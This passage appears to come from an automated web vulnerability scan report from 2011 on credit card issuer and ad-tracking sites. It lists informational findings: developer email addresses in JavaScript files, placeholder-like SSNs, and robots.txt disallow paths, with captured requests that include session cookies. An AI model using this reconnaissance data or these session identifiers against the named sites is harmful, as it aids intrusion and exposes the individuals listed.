Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:53 GMT
Server: Apache
Last-Modified: Tue, 29 Sep 2009 17:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5394
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* mcd-js Event Utilities
*
* @author Michael Girouard (mgirouard@mcdpartners.com)
* @requires mcd.dom
*/
mcd.event = function () {

   var ELEMENT_INDEX = 0;
   var TYPE_INDEX = 1;
   var ACTION_INDEX = 2;
   var SCOPED_ACTION_INDEX = 3;

   var cachedAct
...[SNIP]...

18.25. https://www.discovercard.com/scripts/src/mcd/http.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/src/mcd/http.js

Issue detail

The following email address was disclosed in the response:

mikeg@mcdpartners.com

Request

GET /scripts/src/mcd/http.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:55 GMT
Server: Apache
Last-Modified: Fri, 13 Feb 2009 22:41:41 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 3844
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/**
* MCD HTTP Class
*
* @namespace mcd
* @author Michael Girouard (mikeg@mcdpartners.com)
*
* Derived from Panda-JS library (http://panda-js.googlecode.com)
*/
mcd.http = (function() {
   var http;
   var config = {};
   var createRequestInstance = function () {
if (window.X
...[SNIP]...

18.26. https://www.discovercard.com/scripts/src/mcd/util.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/scripts/src/mcd/util.js

Issue detail

The following email addresses were disclosed in the response:

mjulio@mcdpartners.com
msmith@mcdpartners.com

Request

GET /scripts/src/mcd/util.js HTTP/1.1
Host: www.discovercard.com
Connection: keep-alive
Referer: https://www.discovercard.com/cardmembersvcs/acqs/app/getapp?sc=RJCT&iq_id=e11104bb02011c1068c17074e28a433
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=F457A4E6990CD631; JSESSIONID=00016ZyTVoyONQxxPi4taI__Gdv:13ffav57i; mbox=check#true#1308313791|session#1308313730257-773381#1308315591

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:54 GMT
Server: Apache
Last-Modified: Fri, 17 Jul 2009 12:15:19 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 5736
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: application/x-javascript

/* Silently create the mcd namespace if it does not exist */
if (typeof mcd === 'undefined') {
   var mcd = {};
}
mcd.util = function () {

var D = mcd.dom;
var E = mcd.event;

...[SNIP]...
window.open(this.getAttribute('href'), '_blank');
               });
           }
       },

       /**
        * Sorts array removing any undefined (deleted) values
        *
        * @param {Array}
        * @author Michael T. Smith (msmith@mcdpartners.com)
        */
       resortArray : function (dirtyArray) {
           var cleanArray = [];

           for ( var i = 0; i < dirtyArray.length; i++ ) {
            if (dirtyArray[i] !== (undefined || null)) {
                   cleanArray.push(dirtyArray[i]);
            }
           }

           return cleanArray;
       },

       /**
        * Returns the length of an array
        *
        * @param {Object}
        * @author Michael T. Smith (msmith@mcdpartners.com)
        */
       objectLength : function (object) {
           var iterator = 0;
           for (property in object) {
               iterator = iterator + 1;
           }
           return iterator;
       },

       /**
        * Toggles the disabled property of inputes
        *
        * @param {String|HTMLElement} id
        * @author Miguel Julio (mjulio@mcdpartners.com)
        */
       toggleDisabled : function (id) {
           mcd.dom.getElement(id).disabled = !mcd.dom.getElement(id).disabled;
       },

       // FIXME: Need doc block
       identicalArray : function (arrayA, arrayB)
...[SNIP]...

19. Social security numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://www.applyonlinenow.com
Path:	/USCCapp/Ctl/entry

Issue detail

The following social security numbers were disclosed in the response:

123-45-6789
555-55-5555

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

Request

Response

20. Robots.txt file previous next
There are 32 instances of this issue:

http://ad.doubleclick.net/getcamphist
http://ad.yieldmanager.com/pixel
http://ads.bluelithium.com/pixel
http://americanexpress.122.2o7.net/b/ss/amexamuprod3/1/H.22.1/s04938754958885
http://as00.estara.com/fs/lr.php
http://b.scorecardresearch.com/b
http://blogs.creditcards.com/
http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s96646893902216
http://citi.bridgetrack.com/usc/_spredir.htm
http://click.linksynergy.com/fs-bin/click
http://clickserve.cc-dt.com/link/tplclick
http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm
http://creditcardscom.112.2o7.net/b/ss/ccardsccdc-us/1/H.15.1/s98389890177641
http://feeds.bbci.co.uk/news/rss.xml
http://fls.doubleclick.net/json
http://gan.doubleclick.net/gan_click
http://googleads.g.doubleclick.net/pagead/ads
http://integrate.112.2o7.net/dfa_echo
http://l.addthiscdn.com/live/t00/100lo.gif
http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s09489397513680
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://oc.creditcards.com/trans_node.php
http://omn.americanexpress.com/b/ss/amexpressprod/1/H.22.1/s01210553133141
http://s7.addthis.com/static/r07/sh44.html
http://s9.addthis.com/js/widget.php
http://spotlight.creditcards.com/www/delivery/ajs.php
http://www.creditcards.com/points-rewards.php
http://www.discovercard.com/customer-service/terms-of-use.html
https://www.discovercard.com/cardmembersvcs/acqs/app/getapp
http://www.google-analytics.com/__utm.gif
http://www201.americanexpress.com/favicon.ico
https://www201.americanexpress.com/business-credit-cards/simplycash-business-credit-card-application/42732

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

20.1. http://ad.doubleclick.net/getcamphist previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/getcamphist

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Fri, 17 Jun 2011 12:04:21 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

20.2. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Fri, 17 Jun 2011 11:58:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Fri, 17 Jun 2011 11:58:30 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

20.3. http://ads.bluelithium.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

20.4. http://americanexpress.122.2o7.net/b/ss/amexamuprod3/1/H.22.1/s04938754958885 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://americanexpress.122.2o7.net
Path:	/b/ss/amexamuprod3/1/H.22.1/s04938754958885

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: americanexpress.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:45 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "234de7-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www325
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.5. http://as00.estara.com/fs/lr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://as00.estara.com
Path:	/fs/lr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: as00.estara.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:03:49 GMT
Server: Apache
Last-Modified: Thu, 05 May 2011 11:40:31 GMT
Accept-Ranges: bytes
Content-Length: 541
Cache-Control: max-age=2592000
Expires: Sun, 17 Jul 2011 12:03:49 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# /robots.txt for as00.estara.com
User-agent: *
Disallow: /adds
Disallow: /Age
Disallow: /api
Disallow: /as
Disallow: /Cha
Disallow: /cmb
Disallow: /comp
Disallow: /coun
Disallow: /Data
Disallow: /Del
...[SNIP]...

20.6. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Sat, 18 Jun 2011 11:59:08 GMT
Date: Fri, 17 Jun 2011 11:59:08 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

20.7. http://blogs.creditcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.creditcards.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: blogs.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:50 GMT
Server: Apache
Last-Modified: Thu, 03 Jul 2008 19:20:55 GMT
ETag: "e79b7-21-45123821593c0"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /manage/

20.8. http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s96646893902216 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cctrkom.creditcards.com
Path:	/b/ss/ccardsccdc-us/1/H.17/s96646893902216

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cctrkom.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:36 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "18d2ef-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www599
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.9. http://citi.bridgetrack.com/usc/_spredir.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://citi.bridgetrack.com
Path:	/usc/_spredir.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: citi.bridgetrack.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 26 May 2011 20:07:36 GMT
Accept-Ranges: bytes
ETag: "2d6ce8ee01bcc1:0"
Server:
Date: Fri, 17 Jun 2011 12:14:01 GMT
Connection: close
Content-Length: 77

User-agent: *
Allow: /
Disallow: /track/
Disallow: /usc/_bt_appredir.asp

20.10. http://click.linksynergy.com/fs-bin/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://click.linksynergy.com
Path:	/fs-bin/click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: click.linksynergy.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"28-1264098640000"
Last-Modified: Thu, 21 Jan 2010 18:30:40 GMT
Content-Type: text/plain
Content-Length: 28
Date: Fri, 17 Jun 2011 11:59:56 GMT
Connection: close

User-agent: *
Disallow: /

20.11. http://clickserve.cc-dt.com/link/tplclick previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clickserve.cc-dt.com
Path:	/link/tplclick

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clickserve.cc-dt.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:07 GMT
Server: Apache/1.3.41 (Unix)
P3P: policyref="http://www.performics.com/w3c/p3p/cc-dt/p3p.xml", CP="NOI DSP COR ADMa DEVa PSAa OUR BUS COM"
Last-Modified: Tue, 12 Jan 2010 15:57:03 GMT
Accept-Ranges: bytes
Content-Length: 194
Connection: close
Content-Type: text/plain

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:

20.12. http://creditcards.citicards.com/usc/platinum/MC/external/affiliate/Mar2011/default.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/platinum/MC/external/affiliate/Mar2011/default.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creditcards.citicards.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 26 May 2011 20:07:36 GMT
Accept-Ranges: bytes
ETag: "2d6ce8ee01bcc1:0"
Server:
Date: Fri, 17 Jun 2011 12:13:02 GMT
Connection: close
Content-Length: 77

User-agent: *
Allow: /
Disallow: /track/
Disallow: /usc/_bt_appredir.asp

20.13. http://creditcardscom.112.2o7.net/b/ss/ccardsccdc-us/1/H.15.1/s98389890177641 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcardscom.112.2o7.net
Path:	/b/ss/ccardsccdc-us/1/H.15.1/s98389890177641

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: creditcardscom.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:09 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "251df0-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www115
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.14. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3541
Expires: Fri, 17 Jun 2011 13:30:25 GMT
Date: Fri, 17 Jun 2011 12:31:24 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

20.15. http://fls.doubleclick.net/json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 17 Jun 2011 12:04:11 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

20.16. http://gan.doubleclick.net/gan_click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://gan.doubleclick.net
Path:	/gan_click

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gan.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sat, 04 Dec 2010 02:47:35 GMT
Date: Fri, 17 Jun 2011 11:59:10 GMT
Expires: Fri, 17 Jun 2011 11:59:10 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

# disallow all spiders
User-agent: *
Disallow: /

# allow the Google Adwords link checker
User-agent: AdsBot-Google
Disallow:

# allow the MSN Adcenter link checker
User-agent: MSNPTC
Disallow:

20.17. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 17 Jun 2011 11:59:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

20.18. http://integrate.112.2o7.net/dfa_echo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://integrate.112.2o7.net
Path:	/dfa_echo

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: integrate.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:28 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "25545d-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www98
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.19. http://l.addthiscdn.com/live/t00/100lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/100lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 17 Jun 2011 11:59:06 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

20.20. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s09489397513680 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.citibank.com
Path:	/b/ss/citinaprod/1/H.22.1/s09489397513680

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.citibank.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:13:58 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "386f56-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www15
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.21. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=80288850
Expires: Wed, 01 Jan 2014 18:58:53 GMT
Date: Fri, 17 Jun 2011 12:31:23 GMT
Connection: close

User-agent: *
Disallow: /

20.22. http://oc.creditcards.com/trans_node.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oc.creditcards.com
Path:	/trans_node.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: oc.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:59:08 GMT
Server: Apache
Last-Modified: Fri, 20 Feb 2009 18:56:12 GMT
ETag: "167338-1a-4635e34dfcb00"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /

20.23. http://omn.americanexpress.com/b/ss/amexpressprod/1/H.22.1/s01210553133141 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://omn.americanexpress.com
Path:	/b/ss/amexpressprod/1/H.22.1/s01210553133141

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omn.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:04:34 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "2f4193-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www426
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

20.24. http://s7.addthis.com/static/r07/sh44.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s7.addthis.com
Path:	/static/r07/sh44.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 11:04:31 GMT
ETag: "d099d3-1b-4a4038d666dc0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 17 Jun 2011 12:11:50 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

20.25. http://s9.addthis.com/js/widget.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s9.addthis.com
Path:	/js/widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s9.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Jun 2011 11:39:23 GMT
ETag: "df8ab7-1b-4a51dabdf10c0"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 17 Jun 2011 11:58:49 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

20.26. http://spotlight.creditcards.com/www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://spotlight.creditcards.com
Path:	/www/delivery/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spotlight.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:57 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 19:25:56 GMT
ETag: "b7aa9-17a-4903d2e989900"
Accept-Ranges: bytes
Content-Length: 378
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

20.27. http://www.creditcards.com/points-rewards.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/points-rewards.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.creditcards.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 11:58:28 GMT
Server: Apache
Last-Modified: Wed, 08 Dec 2010 16:54:24 GMT
ETag: "925c7b-19b-496e8f92e9000"
Accept-Ranges: bytes
Content-Length: 411
Vary: Accept-Encoding
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /t.php
Disallow: /sb.php
Disallow: /enter/
Disallow: /oc.php
Disallow: /oc/
Disallow: /b/
Disallow: /ptrans/
Disallow: /xtrack.php
Disallow: /search.php
Disallow: /matrix/
Disa
...[SNIP]...

20.28. http://www.discovercard.com/customer-service/terms-of-use.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discovercard.com
Path:	/customer-service/terms-of-use.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:31:01 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 18:20:17 GMT
Accept-Ranges: bytes
Content-Length: 983
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /app/
Disallow: /acqs/
Disallow: /deskshop/
Disallow: /cardart/
Disallow: /cardoffers/
Disallow: /inboundtm/
Disallow: /cardoffers/
Disallow: /accountcenter/
Disallow:
...[SNIP]...

20.29. https://www.discovercard.com/cardmembersvcs/acqs/app/getapp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.discovercard.com
Path:	/cardmembersvcs/acqs/app/getapp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discovercard.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:28:44 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 18:20:17 GMT
Accept-Ranges: bytes
Content-Length: 983
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /app/
Disallow: /acqs/
Disallow: /deskshop/
Disallow: /cardart/
Disallow: /cardoffers/
Disallow: /inboundtm/
Disallow: /cardoffers/
Disallow: /accountcenter/
Disallow:
...[SNIP]...

20.30. http://www.google-analytics.com/__utm.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google-analytics.com
Path:	/__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Fri, 17 Jun 2011 12:31:08 GMT
Expires: Fri, 17 Jun 2011 12:31:08 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

20.31. http://www201.americanexpress.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www201.americanexpress.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:00:03 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 30 Sep 2010 03:24:59 GMT
ETag: "d6a9-33a-9f6e98c0"
Accept-Ranges: bytes
Content-Length: 826
Connection: close
Content-Type: text/plain

# American Express
# Format is:
# User-agent: <name of spider>
# Disallow: <nothing> | <path>
# Date By Reason
# 20011119 SEU Initial robots
# 20090810 AET Prevent inde
...[SNIP]...

20.32. https://www201.americanexpress.com/business-credit-cards/simplycash-business-credit-card-application/42732 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www201.americanexpress.com
Path:	/business-credit-cards/simplycash-business-credit-card-application/42732

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 12:06:49 GMT
